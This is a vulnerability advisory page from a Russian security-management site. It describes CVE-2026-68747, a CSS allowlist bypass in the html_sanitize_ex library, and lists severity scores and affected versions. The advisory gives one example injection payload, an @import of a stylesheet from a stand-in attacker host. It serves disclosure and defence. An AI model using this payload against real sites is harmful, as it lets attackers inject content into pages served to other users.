Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.

CVE-2026-68747

PUBLISHED 19.08.2026

CNA: EEF

CSS sanitizer allowlist bypass in html_sanitize_ex via non-declaration input

Обновлено: 19.08.2026
Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') vulnerability in the CSS scrubber in rrrene html_sanitize_ex allows an unauthenticated remote attacker to inject CSS at-rules, including an import of a remote stylesheet, into a page served to other users. HtmlSanitizeEx.Scrubber.CSS.scrub/1 applies its property and value allowlist through a Regex.replace over substrings matching a property: value declaration pattern, so input that does not match that pattern is never inspected and is copied to the output unchanged. @import url(//attacker.example/style.css); survives, while the same URL inside a background: url(...) declaration is removed. Element boundaries are resolved before the scrubber runs, so injected content does not escape the <style> element and no script executes. This issue affects html_sanitize_ex: from 0.3.1 before 1.4.5 and from 1.5.0-rc.0 before 1.5.4.

CWE

Идентификатор Описание
CWE-74 The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.

CVSS

Оценка Severity Версия Базовый вектор
2.3 LOW 4.0 CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

EPSS

Вероятность Severity Процентиль ? Дата расчёта
0.25% LOW 16.72 30.08.2026

Доп. Информация

Product Status

html_sanitize_ex
Product: html_sanitize_ex
Vendor: rrrene
Default status: unaffected
Версии:
Затронутые версии Статус
Наблюдалось в версиях от 0.3.1 до 1.4.5 affected
Наблюдалось в версиях от 1.5.0-rc.0 до 1.5.4 affected
СPE:
  • cpe:2.3:a:rrrene:html_sanitize_ex:*:*:*:*:*:*:*:*
html_sanitize_ex
Product: html_sanitize_ex
Vendor: rrrene
Default status: unaffected
Версии:
Затронутые версии Статус
Наблюдалось в версиях от 21f90012eb21aa36f4e3701b7547e12faf0f3c8b до * affected
СPE:
  • cpe:2.3:a:rrrene:html_sanitize_ex:*:*:*:*:*:*:*:*
 

Ссылки

CISA ADP Vulnrichment

Обновлено: 06.08.2026
Этот блок содержит дополнительную информацию, предоставленную программой CVE для этой уязвимости.

SSVC

Exploitation Automatable Technical Impact Версия Дата доступа
none no partial 2.0.3 06.08.2026

Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.